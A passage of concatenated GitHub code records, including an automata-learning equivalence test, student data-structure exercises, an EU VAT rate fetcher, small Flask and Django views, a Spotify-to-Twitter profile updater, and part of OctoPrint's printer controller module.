None:\n raise Exception(\"Hypothesis cannot be None\")\n\n W = []\n\n states = hypothesis.get_states()\n \n # compute all couples of states\n state_couples = itertools.combinations(states, 2)\n\n # Constructing the characterization set W of the hypothesis\n for couple in state_couples:\n # Computes a distinguishing string for each couple of state\n W.append(self.__compute_distinguishable_string(hypothesis, couple))\n\n # computes P\n P = self.__computesP(hypothesis)\n self._logger.debug(\"P= {}\".format(P))\n\n # computes Z\n Z = self.__computesZ(hypothesis, W)\n self._logger.debug(\"Z= {}\".format(Z))\n\n # T = P . Z\n T = P + Z\n self._logger.debug(\"T={}\".format(T))\n\n # check if one of the computed testcase highlights a counterexample\n for i_testcase, testcase_query in enumerate(T[1:]):\n self._logger.debug(\"Executing testcase {}/{} : {}\".format(i_testcase, len(T)-1, testcase_query))\n\n # computes the hypothesis output\n hypothesis_output_word = hypothesis.play_query(testcase_query)[0]\n\n self.knowledge_base.resolve_query(testcase_query)\n real_output_word = testcase_query.output_word\n\n self._logger.debug(real_output_word)\n self._logger.debug(hypothesis_output_word)\n if real_output_word != hypothesis_output_word:\n return testcase_query\n return None\n\n def __computesZ(self, hypothesis, W): \n \"\"\"it follows the formula Z= W U (X^1.W) U .... U (X^(m-1-n).W) U (W^(m-n).W)\n\n \"\"\"\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n if W is None:\n raise Exception(\"W cannot be None\")\n \n self._logger.debug(\"Computing Z\")\n\n Z = []\n Z.extend(W)\n \n states = hypothesis.get_states()\n v = self.max_states - len(states)\n if v < 0:\n v = 0\n self._logger.debug(\"V= {}\".format(v))\n\n output_queries = []\n for input_letter in self.input_letters:\n output_query = OutputQuery(word = Word([input_letter]))\n output_queries.append(output_query)\n\n X = dict()\n X[0] = W\n for i in range(1, v+1):\n self._logger.debug(\"Computing X^{}\".format(i))\n X[i] = []\n previous_X = X[i-1]\n for x in previous_X:\n X[i].extend(x.multiply(output_queries))\n for w in W:\n for xi in X[i]:\n if not xi in Z:\n Z.append(xi)\n\n return Z\n\n def __computesP(self, hypothesis):\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n self._logger.debug(\"Computing P\")\n\n P = []\n \n empty_word = Word([EmptyLetter()])\n current_query = OutputQuery(empty_word)\n P.append(current_query)\n\n open_queries = deque([current_query])\n close_queries = []\n\n seen_states = set([hypothesis.initial_state])\n while len(open_queries) > 0:\n query = open_queries.popleft()\n tmp_seen_states = set()\n\n for letter in self.input_letters:\n new_word = query.input_word + Word([letter])\n query_z = OutputQuery(new_word)\n (output_word, visited_states) = hypothesis.play_query(query_z)\n close_queries.append(query_z)\n \n if visited_states[-1] not in seen_states:\n tmp_seen_states.add(visited_states[-1])\n open_queries.append(query_z)\n\n seen_states.update(tmp_seen_states)\n\n P.extend(close_queries)\n\n return P\n \n def __compute_distinguishable_string(self, hypothesis, couple):\n self._logger.debug(\"Computes the distinguishable string for state couple '{}'\".format(couple))\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n if couple is None:\n raise Exception(\"couple cannot be None\")\n \n self._logger.debug(\"Computing distinguishing strings for states {}\".format(couple))\n queries_to_test = deque([])\n \n empty_word = Word([EmptyLetter()])\n z_query = OutputQuery(empty_word)\n for letter in self.input_letters:\n new_word = z_query.input_word + Word([letter])\n queries_to_test.append(OutputQuery(new_word))\n\n distinguishable_query = z_query\n\n done = False\n i = 0\n while not done:\n query = queries_to_test.popleft()\n if i > self.max_states * self.max_states:\n break\n\n if not self.__is_distinguishable_states(hypothesis, query, couple):\n done = False\n for letter in self.input_letters:\n new_query = OutputQuery(query.input_word + Word([letter]))\n queries_to_test.append(new_query)\n else:\n done = True\n distinguishable_query = query\n\n i = i + 1\n\n return distinguishable_query\n \n def __is_distinguishable_states(self, hypothesis, query, couple):\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n if query is None:\n raise Exception(\"query cannot be None\")\n if couple is None:\n raise Exception(\"couple cannot be None\")\n\n output_word_state0 = hypothesis.play_word(query.input_word, couple[0])[0]\n output_word_state1 = hypothesis.play_word(query.input_word, couple[1])[0]\n \n return output_word_state0 != output_word_state1\n\n","repo_name":"gbossert/pylstar","sub_path":"src/pylstar/eqtests/WpMethodEQ.py","file_name":"WpMethodEQ.py","file_ext":"py","file_size_in_byte":6551,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"96"} +{"seq_id":"2911327770","text":"class nodo():\r\n def __init__(self,dato):\r\n self.valor=dato\r\n self.left=None\r\n self.right=None\r\n\r\ndef preorder(node):\r\n if node:\r\n print(node.valor,end=\"-\")\r\n preorder(node.left)\r\n preorder(node.right)\r\ndef inorder(node):\r\n if node:\r\n preorder(node.left)\r\n print(node.valor,end=\"-\")\r\n preorder(node.right)\r\ndef postorder(node):\r\n if node:\r\n preorder(node.left)\r\n preorder(node.right)\r\n print(node.valor,end=\"-\")\r\ndef altura(node):\r\n if node is None:\r\n return 0\r\n return 1 + max(altura(node.left), altura(node.right))\r\n\r\ndef numNodos(node):\r\n if node is None:\r\n return 0\r\n else:\r\n return 1+numNodos(node.left)+numNodos(node.right)\r\n#..........................\r\n\r\na=nodo(50) #Nodo Raiz\r\nprint(a.left,a.valor,a.right)\r\n\r\nai=nodo(100)\r\nad=nodo(200)\r\n\r\na.left=ai\r\na.right=ad\r\nprint(a.left.valor,a.valor,a.right.valor)\r\n\r\n\r\nad.left=nodo('A')\r\nad.right=nodo('B')\r\na.right.left=nodo('A')\r\na.right.right=nodo('B')\r\nprint(a.right.left.valor,a.right.valor,a.right.right.valor)\r\n\r\na.right.left.left=nodo('Z')\r\nprint(a.right.left.left.valor,a.right.left.valor)\r\n\r\na.right.left.left.left=nodo(8)\r\na.right.left.left.right=nodo(9)\r\nprint(a.right.left.left.left.valor,a.right.left.left.valor,a.right.left.left.right.valor)\r\n\r\n# print(\"postorder\")\r\n# postorder(a)\r\n# print()\r\n\r\n# print (\"inorder\")\r\n# inorder(a)\r\n# print()\r\n\r\n# print(\"preorder\")\r\n# preorder(a)\r\n\r\nprint(\"altura:\",altura(a))\r\n\r\n\r\ndef numNodos(node):\r\n if node is None:\r\n return 0\r\n else:\r\n return 1+numNodos(node.left)+numNodos(node.right)\r\nprint(\"nodos\",numNodos(a))\r\n","repo_name":"Zentenoo/Practicas-con-Python","sub_path":"python/arboles.py","file_name":"arboles.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26301060651","text":"import dis\n\nclass FirstSingleton:\n\n __instance = None\n\n def __init__(self):\n if FirstSingleton.__instance != None:\n raise \"Error\"\n else:\n FirstSingleton.__instance = self\n\n @staticmethod\n def getInstance():\n if FirstSingleton.__instance == None:\n FirstSingleton()\n return FirstSingleton.__instance\n\n def doSomething(self):\n self.location = \"\"\n \n\nclass SecondSingleton:\n\n __instance = None\n\n def __init__(self):\n if SecondSingleton.__instance != None:\n raise \"Error\"\n else:\n SecondSingleton.__instance = self\n\n @classmethod\n def getInstance(cls):\n if cls.__instance == None:\n cls()\n return cls.__instance\n\n def doSomething(self):\n self.location = \"\"\n\nprint(\"FirstSingleton\")\nprint(dis.disco(FirstSingleton))\nprint(\"SecondSingleton\")\nprint(dis.disco(SecondSingleton))","repo_name":"charlesemurray/DesignPatternProblems","sub_path":"class_tests.py","file_name":"class_tests.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11881385590","text":"from typing import Union, Optional, List, Dict\nimport requests\nimport datetime\nimport decimal\nimport json\n\nfrom eurovat.states import EUState, states\nfrom eurovat.rate import VatRate, VatRules\n\nquery_url = \"https://ec.europa.eu/taxation_customs/tedb/vatSearchResult.json\"\ndateformat = \"%Y/%m/%d\"\n\ndef get_rates(countries: List[Union[str, EUState]], date_from: Optional[datetime.date]=None, date_to: Optional[datetime.date]=None) -> List[VatRules]:\n countries_lst = []\n\n for country in countries:\n if isinstance(country, EUState):\n countries_lst.append(country.msa_id)\n else:\n countries_lst.append(EUState.get(country).msa_id)\n\n if date_to is None:\n date_to = datetime.date.today()\n\n if date_from is None:\n date_from_str = \"\"\n else:\n date_from_str = date_from.strftime(dateformat)\n\n request = requests.post(\n url=query_url,\n params={\n \"selectedMemberStates\": countries_lst,\n \"dateFrom\": date_from_str.encode(),\n \"dateTo\": date_to.strftime(dateformat).encode()\n })\n \n data = request.json()\n\n rates: Dict[str, List[VatRate]] = {}\n \n for row in data:\n assert row[\"type\"] in (\"STANDARD\", \"REDUCED\")\n country_code = row[\"memberState\"][\"defaultCountryCode\"]\n reduced = row[\"type\"] != \"STANDARD\"\n rate = decimal.Decimal(row[\"rate\"][\"value\"])\n\n cn_codes = [\n code[\"key\"][\"code\"]\n for code in row[\"cnCodes\"]\n ]\n\n cpa_codes = [\n code[\"key\"][\"code\"]\n for code in row[\"cpaCodes\"]\n\n ]\n\n start_date = row[\"situationOn\"]\n\n rates.setdefault(country_code, [])\n rates[country_code].append(\n VatRate(\n reduced=reduced,\n rate = rate,\n situation_on=start_date/1000,\n cn_codes = cn_codes,\n cpa_codes = cpa_codes,\n category = row[\"category\"],\n description = row[\"comments\"] or \"\"\n )\n )\n \n # WORKAROUND for missing rule:\n rates[\"DE\"].append(VatRate(\n reduced=False,\n rate=decimal.Decimal(\"16\"),\n cn_codes=[],\n cpa_codes=[],\n situation_on=datetime.datetime(2020, 7, 1).timestamp()\n ))\n\n # canary-islands-reduced rate\n spanish_standard_rates = filter(lambda el: el.reduced==False, rates[\"ES\"])\n for rate_es in spanish_standard_rates:\n if rate_es.description:\n rate_es.reduced = True\n \n return [\n VatRules(EUState.get(country_name), rate_lst)\n \n for country_name, rate_lst in rates.items()\n ]\n","repo_name":"airgproducts/eurovat","sub_path":"eurovat/tedb.py","file_name":"tedb.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"19350342695","text":"from collections import deque\n\nT = int(input())\n\nfor _ in range(T):\n commands = input()\n n = int(input())\n nums = deque(input()[1:-1].split(','))\n\n if n == 0:\n nums = deque()\n\n REVERSED = False\n ERROR = False\n\n for cmd in commands:\n if cmd == 'R':\n REVERSED = not REVERSED\n\n if cmd == 'D':\n if not nums:\n ERROR = True\n break\n if REVERSED:\n nums.pop()\n else:\n nums.popleft()\n\n if ERROR:\n print(\"error\")\n elif REVERSED:\n print('[' + ','.join(list(nums)[::-1]) + ']')\n else:\n print('[' + ','.join(nums) + ']')\n","repo_name":"JwahoonKim/PS","sub_path":"백준/Python/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"32096727521","text":"\"\"\"\nLogin view\n\nViewset to user serializer\n\"\"\"\n\n# Django Rest Framework\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.response import Response\n\n# Accounts serializer\nfrom apps.accounts.serializers import (\n LoginSerializer,\n UserSerializer\n)\n\n\nclass LoginView(CreateAPIView):\n \"\"\"\n Login view\n\n Execute the logic to perform the user and client login\n \"\"\"\n serializer_class = LoginSerializer\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n create get user's token\n \"\"\"\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user, token = serializer.save()\n user = UserSerializer(user).data\n data = {\n 'user': user,\n 'token': token\n }\n return Response(data)\n","repo_name":"ivanmtoroc/superdrogas","sub_path":"apps/accounts/viewsets/login_view.py","file_name":"login_view.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"96"} +{"seq_id":"42571528338","text":"import webop\nimport fileop\n\n\ndef main():\n url = input('Nhập link khởi đầu: ')\n count = int(input('Nhập số lượng trang: '))\n waiting_line = webop.lay_cac_duong_link(webop.doc_noi_dung(url), url)\n history = webop.countlink(waiting_line, url, count)\n fileop.thumuc(input('Nhập tên thư mục lưu file: '))\n fileop.luufile(history, count)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"TDMVu18/pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40544153346","text":"from flask import request, render_template, g, flash, redirect, url_for, jsonify\nfrom flask.ext.login import login_required\n\nfrom mysite import app\nfrom mysite.models.board import Board\nfrom mysite.models.list import List\nfrom mysite.api.utils import error, ok\nfrom mysite.api.const import Error\n\n\n@app.route('/board/', methods=['GET', 'POST'])\n@login_required\ndef board():\n if request.method == 'GET':\n board_ids = Board.get_board_ids_by_netid(g.user.netid)\n boards = map(Board.get_board_by_id, board_ids)\n return render_template(\"board.html\", boards=boards)\n else:\n # request.method == 'POST'\n name = request.form.get('name')\n if not name:\n flash(\"Board name can not be empty.\")\n return redirect(url_for('board'))\n Board.add_board(name)\n return redirect(url_for('board'))\n\n\n@app.route(\"/board//\", methods=['GET'])\n@login_required\ndef board_page(board_id):\n if not Board.has_access_to(g.user.netid, board_id):\n return render_template(\"no_access.html\")\n lists = List.get_lists_by_board_id(board_id)\n return render_template(\"board_page.html\", lists=lists)\n\n\n@app.route(\"/board//list/\", methods=['GET', 'POST'])\n@login_required\ndef board_list(board_id):\n \"\"\"\n GET: get all lists of the specified board\n POST: add a list to the specified board\n\n Return JSON.\n \"\"\"\n if request.method == 'GET':\n lists = List.get_lists_by_board_id(board_id)\n return ok({\"lists\": map(lambda x: x.to_dict(), lists)})\n elif request.method == 'POST':\n name = request.form.get(\"name\")\n if not name:\n return error(Error.EMPTY_LIST_NAME, 400)\n\n if not Board.has_access_to(g.user.netid, board_id):\n return error(Error.NO_ACCESS_TO_BOARD, 400)\n\n list_ = List.add_list(board_id, name)\n return ok({\"created\": True, \"list\": list_.to_dict()})\n","repo_name":"CoCornell/CoCornell","sub_path":"views/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"12737109505","text":"import os\nimport time\nimport signal\nfrom driver.driver import *\n\nglobal user_name\nglobal tweepy_api\n\ndef keyboardInterruptHandler(signal, frame):\n\ttry:\n\t\ttweepy_api.update_profile(name=user_name)\n\t\texit(0)\n\texcept:\n\t\texit(0)\n\nsignal.signal(signal.SIGINT, keyboardInterruptHandler)\n\ntweepy_api = new_tweepy_client()\nspotipy_client = new_spotipy_client()\n\ntry:\n\tscreen_name = tweepy_api.get_settings()[\"screen_name\"]\nexcept: # reset access credential in case of auth failure.\n\tupdate_tweepy_access_token(\"\",\"\")\nprint(screen_name)\nuser = tweepy_api.get_user(screen_name=screen_name)\n\nprint(\"ctrl+c (SIGINT) to stop and get back to original name\")\n\nprevious_name = \"\"\nwhile(1):\n\tuser_name = user._json[\"name\"].split(\"🎵\")[0]\n\ttry:\n\t\tcurrent_play = spotipy_client.current_playback()\n\t\tcurrent_track_name = current_play[\"item\"][\"name\"]\n\t\tcurrent_track_artist_list = current_play[\"item\"][\"artists\"]\n\t\tcurrent_track_artist_name_list = \"\"\n\texcept:\n\t\tprint(\"Can't achieve Nowplaying\")\n\t\ttweepy_api.update_profile(name=user_name)\n\t\ttime.sleep(30)\n\t\tcontinue\n\tfor artist in current_track_artist_list:\n\t\tcurrent_track_artist_name_list +=artist[\"name\"]\n\ttrack_display = current_track_name+\"/\"+current_track_artist_name_list\n\ttarget_name = (user_name+\"🎵\"+track_display)[:50]\n\tif previous_name != target_name:\n\t\tprint(\"Updating to :\",target_name)\n\t\tprevious_name = target_name\n\t\ttweepy_api.update_profile(name=target_name)\t\n\ttime.sleep(30)\n","repo_name":"EBebBeBeb/spotify-with-twitter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9283042000","text":"\"\"\"\nThis module holds the standard implementation of the :class:`PrinterInterface` and it helpers.\n\"\"\"\n\n__author__ = \"Gina Häußge \"\n__license__ = \"GNU Affero General Public License http://www.gnu.org/licenses/agpl.html\"\n__copyright__ = \"Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License\"\n\nimport copy\nimport logging\nimport os\nimport threading\nimport time\n\nfrom frozendict import frozendict\n\nimport octoprint.util.json\nfrom octoprint import util as util\nfrom octoprint.events import Events, eventManager\nfrom octoprint.filemanager import FileDestinations, NoSuchStorage, valid_file_type\nfrom octoprint.plugin import ProgressPlugin, plugin_manager\nfrom octoprint.printer import (\n InvalidFileLocation,\n InvalidFileType,\n PrinterCallback,\n PrinterInterface,\n UnknownScript,\n)\nfrom octoprint.printer.estimation import PrintTimeEstimator\nfrom octoprint.settings import settings\nfrom octoprint.util import InvariantContainer\nfrom octoprint.util import comm as comm\nfrom octoprint.util import get_fully_qualified_classname as fqcn\nfrom octoprint.util import to_unicode\n\n\nclass Printer(PrinterInterface, comm.MachineComPrintCallback):\n \"\"\"\n Default implementation of the :class:`PrinterInterface`. Manages the communication layer object and registers\n itself with it as a callback to react to changes on the communication layer.\n \"\"\"\n\n def __init__(self, fileManager, analysisQueue, printerProfileManager):\n from collections import deque\n\n self._logger = logging.getLogger(__name__)\n self._logger_job = logging.getLogger(f\"{__name__}.job\")\n\n self._dict = (\n frozendict\n if settings().getBoolean([\"devel\", \"useFrozenDictForPrinterState\"])\n else dict\n )\n\n self._analysisQueue = analysisQueue\n self._fileManager = fileManager\n self._printerProfileManager = printerProfileManager\n\n self._temps = DataHistory(\n cutoff=settings().getInt([\"temperature\", \"cutoff\"]) * 60\n )\n self._markings = DataHistory(\n cutoff=settings().getInt([\"temperature\", \"cutoff\"]) * 60\n )\n\n self._messages = deque([], 300)\n self._log = deque([], 300)\n\n self._state = None\n\n self._currentZ = None\n\n self._printAfterSelect = False\n self._posAfterSelect = None\n\n self._firmware_info = None\n\n # sd handling\n self._sdPrinting = False\n self._sdStreaming = False\n self._streamingFinishedCallback = None\n self._streamingFailedCallback = None\n\n # job handling & estimation\n self._selectedFileMutex = threading.RLock()\n self._selectedFile = None\n\n self._estimator_factory = PrintTimeEstimator\n self._estimator = None\n analysis_queue_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.estimation.factory\"\n )\n for name, hook in analysis_queue_hooks.items():\n try:\n estimator = hook()\n if estimator is not None:\n self._logger.info(f\"Using print time estimator provided by {name}\")\n self._estimator_factory = estimator\n except Exception:\n self._logger.exception(\n f\"Error while processing analysis queues from {name}\",\n extra={\"plugin\": name},\n )\n\n # hook card upload\n self.sd_card_upload_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.sdcardupload\"\n )\n\n # comm\n self._comm = None\n\n # callbacks\n self._callbacks = []\n\n # progress plugins\n self._lastProgressReport = None\n self._progressPlugins = plugin_manager().get_implementations(ProgressPlugin)\n\n self._additional_data_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.additional_state_data\"\n )\n self._blacklisted_data_hooks = []\n\n self._stateMonitor = StateMonitor(\n interval=0.5,\n on_update=self._sendCurrentDataCallbacks,\n on_add_temperature=self._sendAddTemperatureCallbacks,\n on_add_log=self._sendAddLogCallbacks,\n on_add_message=self._sendAddMessageCallbacks,\n on_get_progress=self._updateProgressDataCallback,\n on_get_resends=self._updateResendDataCallback,\n )\n self._stateMonitor.reset(\n state=self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n ),\n job_data=self._dict(\n file=self._dict(name=None, path=None, size=None, origin=None, date=None),\n estimatedPrintTime=None,\n lastPrintTime=None,\n filament=self._dict(length=None, volume=None),\n user=None,\n ),\n progress=self._dict(\n completion=None,\n filepos=None,\n printTime=None,\n printTimeLeft=None,\n printTimeOrigin=None,\n ),\n current_z=None,\n offsets=self._dict(),\n resends=self._dict(count=0, ratio=0),\n )\n\n eventManager().subscribe(\n Events.METADATA_ANALYSIS_FINISHED, self._on_event_MetadataAnalysisFinished\n )\n eventManager().subscribe(\n Events.METADATA_STATISTICS_UPDATED, self._on_event_MetadataStatisticsUpdated\n )\n eventManager().subscribe(Events.CHART_MARKED, self._on_event_ChartMarked)\n\n self._handle_connect_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.handle_connect\"\n )\n\n def _create_estimator(self, job_type=None):\n if job_type is None:\n with self._selectedFileMutex:\n if self._selectedFile is None:\n return\n\n if self._selectedFile[\"sd\"]:\n job_type = \"sdcard\"\n else:\n job_type = \"local\"\n\n self._estimator = self._estimator_factory(job_type)\n\n @property\n def firmware_info(self):\n return frozendict(self._firmware_info) if self._firmware_info else None\n\n # ~~ handling of PrinterCallbacks\n\n def register_callback(self, callback, *args, **kwargs):\n if not isinstance(callback, PrinterCallback):\n self._logger.warning(\n \"Registering an object as printer callback which doesn't implement the PrinterCallback interface\"\n )\n self._callbacks.append(callback)\n\n def unregister_callback(self, callback, *args, **kwargs):\n try:\n self._callbacks.remove(callback)\n except ValueError:\n # not registered\n pass\n\n def send_initial_callback(self, callback):\n if callback in self._callbacks:\n self._sendInitialStateUpdate(callback)\n\n def _sendAddTemperatureCallbacks(self, data):\n for callback in self._callbacks:\n try:\n callback.on_printer_add_temperature(data)\n except Exception:\n self._logger.exception(\n \"Exception while adding temperature data point to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _sendAddLogCallbacks(self, data):\n for callback in self._callbacks:\n try:\n callback.on_printer_add_log(data)\n except Exception:\n self._logger.exception(\n \"Exception while adding communication log entry to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _sendAddMessageCallbacks(self, data):\n for callback in self._callbacks:\n try:\n callback.on_printer_add_message(data)\n except Exception:\n self._logger.exception(\n \"Exception while adding printer message to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _sendCurrentDataCallbacks(self, data):\n plugin_data = self._get_additional_plugin_data(initial=False)\n for callback in self._callbacks:\n try:\n data_copy = copy.deepcopy(data)\n if plugin_data:\n data_copy.update(plugins=copy.deepcopy(plugin_data))\n callback.on_printer_send_current_data(data_copy)\n except Exception:\n self._logger.exception(\n \"Exception while pushing current data to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _get_additional_plugin_data(self, initial=False):\n plugin_data = {}\n\n for name, hook in self._additional_data_hooks.items():\n if name in self._blacklisted_data_hooks:\n continue\n try:\n additional = hook(initial=initial)\n if additional and isinstance(additional, dict):\n octoprint.util.json.dumps({name: additional})\n plugin_data[name] = additional\n except ValueError:\n self._logger.exception(\n f\"Invalid additional data from plugin {name}\",\n extra={\"plugin\": name},\n )\n except Exception:\n self._logger.exception(\n \"Error while retrieving additional data from plugin {}, blacklisting it for further loops\".format(\n name\n ),\n extra={\"plugin\": name},\n )\n self._blacklisted_data_hooks.append(name)\n\n return plugin_data\n\n # ~~ callback from metadata analysis event\n\n def _on_event_MetadataAnalysisFinished(self, event, data):\n with self._selectedFileMutex:\n if self._selectedFile:\n self._setJobData(\n self._selectedFile[\"filename\"],\n self._selectedFile[\"filesize\"],\n self._selectedFile[\"sd\"],\n self._selectedFile[\"user\"],\n )\n\n def _on_event_MetadataStatisticsUpdated(self, event, data):\n with self._selectedFileMutex:\n if self._selectedFile:\n self._setJobData(\n self._selectedFile[\"filename\"],\n self._selectedFile[\"filesize\"],\n self._selectedFile[\"sd\"],\n self._selectedFile[\"user\"],\n )\n\n # ~~ chart marking insertions\n\n def _on_event_ChartMarked(self, event, data):\n self._markings.append(\n {\n \"type\": data.get(\"type\", \"unknown\"),\n \"label\": data.get(\"label\"),\n \"time\": data.get(\"time\", time.time()),\n }\n )\n\n # ~~ progress plugin reporting\n\n def _reportPrintProgressToPlugins(self, progress):\n with self._selectedFileMutex:\n if (\n progress is None\n or not self._selectedFile\n or \"sd\" not in self._selectedFile\n or \"filename\" not in self._selectedFile\n ):\n return\n\n storage = \"sdcard\" if self._selectedFile[\"sd\"] else \"local\"\n filename = self._selectedFile[\"filename\"]\n\n def call_plugins(storage, filename, progress):\n for plugin in self._progressPlugins:\n try:\n plugin.on_print_progress(storage, filename, progress)\n except Exception:\n self._logger.exception(\n \"Exception while sending print progress to plugin %s\"\n % plugin._identifier,\n extra={\"plugin\": plugin._identifier},\n )\n\n thread = threading.Thread(target=call_plugins, args=(storage, filename, progress))\n thread.daemon = False\n thread.start()\n\n # ~~ PrinterInterface implementation\n\n def connect(self, port=None, baudrate=None, profile=None, *args, **kwargs):\n \"\"\"\n Connects to the printer. If port and/or baudrate is provided, uses these settings, otherwise autodetection\n will be attempted.\n \"\"\"\n if self._comm is not None:\n return\n\n for name, hook in self._handle_connect_hooks.items():\n try:\n if hook(\n self, *args, port=port, baudrate=baudrate, profile=profile, **kwargs\n ):\n self._logger.info(f\"Connect signalled as handled by plugin {name}\")\n return\n except Exception:\n self._logger.exception(\n f\"Exception while handling connect in plugin {name}\",\n extra={\"plugin\": name},\n )\n\n eventManager().fire(Events.CONNECTING)\n self._printerProfileManager.select(profile)\n\n from octoprint.logging.handlers import SerialLogHandler\n\n SerialLogHandler.arm_rollover()\n if not logging.getLogger(\"SERIAL\").isEnabledFor(logging.DEBUG):\n # if serial.log is not enabled, log a line to explain that to reduce \"serial.log is empty\" in tickets...\n logging.getLogger(\"SERIAL\").info(\n \"serial.log is currently not enabled, you can enable it via Settings > Serial Connection > Log communication to serial.log\"\n )\n\n self._firmware_info = None\n self._comm = comm.MachineCom(\n port,\n baudrate,\n callbackObject=self,\n printerProfileManager=self._printerProfileManager,\n )\n self._comm.start()\n\n def disconnect(self, *args, **kwargs):\n \"\"\"\n Closes the connection to the printer.\n \"\"\"\n eventManager().fire(Events.DISCONNECTING)\n if self._comm is not None:\n self._comm.close()\n else:\n eventManager().fire(Events.DISCONNECTED)\n self._firmware_info = None\n\n def get_transport(self, *args, **kwargs):\n if self._comm is None:\n return None\n\n return self._comm.getTransport()\n\n getTransport = util.deprecated(\n \"getTransport has been renamed to get_transport\",\n since=\"1.2.0-dev-590\",\n includedoc=\"Replaced by :func:`get_transport`\",\n )\n\n def job_on_hold(self, blocking=True, *args, **kwargs):\n if self._comm is None:\n raise RuntimeError(\"No connection to the printer\")\n return self._comm.job_put_on_hold(blocking=blocking)\n\n def set_job_on_hold(self, value, blocking=True, *args, **kwargs):\n if self._comm is None:\n raise RuntimeError(\"No connection to the printer\")\n return self._comm.set_job_on_hold(value, blocking=blocking)\n\n def fake_ack(self, *args, **kwargs):\n if self._comm is None:\n return\n\n self._comm.fakeOk()\n\n def commands(self, commands, tags=None, force=False, *args, **kwargs):\n \"\"\"\n Sends one or more gcode commands to the printer.\n \"\"\"\n if self._comm is None:\n return\n\n if not isinstance(commands, (list, tuple)):\n commands = [commands]\n\n if tags is None:\n tags = set()\n tags |= {\"trigger:printer.commands\"}\n\n for command in commands:\n self._comm.sendCommand(command, tags=tags, force=force)\n\n def script(\n self, name, context=None, must_be_set=True, part_of_job=False, *args, **kwargs\n ):\n if self._comm is None:\n return\n\n if name is None or not name:\n raise ValueError(\"name must be set\")\n\n # .capitalize() will lowercase all letters but the first\n # this code preserves existing CamelCase\n event_name = name[0].upper() + name[1:]\n\n event_start = f\"GcodeScript{event_name}Running\"\n payload = context.get(\"event\", None) if isinstance(context, dict) else None\n\n eventManager().fire(event_start, payload)\n\n result = self._comm.sendGcodeScript(\n name,\n part_of_job=part_of_job,\n replacements=context,\n tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.script\"},\n )\n if not result and must_be_set:\n raise UnknownScript(name)\n\n event_end = f\"GcodeScript{event_name}Finished\"\n eventManager().fire(event_end, payload)\n\n def jog(self, axes, relative=True, speed=None, *args, **kwargs):\n if isinstance(axes, str):\n # legacy parameter format, there should be an amount as first anonymous positional arguments too\n axis = axes\n\n if not len(args) >= 1:\n raise ValueError(\"amount not set\")\n amount = args[0]\n if not isinstance(amount, (int, float)):\n raise ValueError(f\"amount must be a valid number: {amount}\")\n\n axes = {}\n axes[axis] = amount\n\n if not axes:\n raise ValueError(\"At least one axis to jog must be provided\")\n\n for axis in axes:\n if axis not in PrinterInterface.valid_axes:\n raise ValueError(\n \"Invalid axis {}, valid axes are {}\".format(\n axis, \", \".join(PrinterInterface.valid_axes)\n )\n )\n\n command = \"G0 {}\".format(\n \" \".join([f\"{axis.upper()}{amt}\" for axis, amt in axes.items()])\n )\n\n if speed is None:\n printer_profile = self._printerProfileManager.get_current_or_default()\n speed = min(printer_profile[\"axes\"][axis][\"speed\"] for axis in axes)\n\n if speed and not isinstance(speed, bool):\n command += f\" F{speed}\"\n\n if relative:\n commands = [\"G91\", command, \"G90\"]\n else:\n commands = [\"G90\", command]\n\n self.commands(commands, tags=kwargs.get(\"tags\", set()) | {\"trigger:printer.jog\"})\n\n def home(self, axes, *args, **kwargs):\n if not isinstance(axes, (list, tuple)):\n if isinstance(axes, str):\n axes = [axes]\n else:\n raise ValueError(f\"axes is neither a list nor a string: {axes}\")\n\n validated_axes = list(\n filter(\n lambda x: x in PrinterInterface.valid_axes, map(lambda x: x.lower(), axes)\n )\n )\n if len(axes) != len(validated_axes):\n raise ValueError(f\"axes contains invalid axes: {axes}\")\n\n self.commands(\n [\n \"G91\",\n \"G28 %s\" % \" \".join(map(lambda x: \"%s0\" % x.upper(), validated_axes)),\n \"G90\",\n ],\n tags=kwargs.get(\"tags\", set) | {\"trigger:printer.home\"},\n )\n\n def extrude(self, amount, speed=None, *args, **kwargs):\n if not isinstance(amount, (int, float)):\n raise 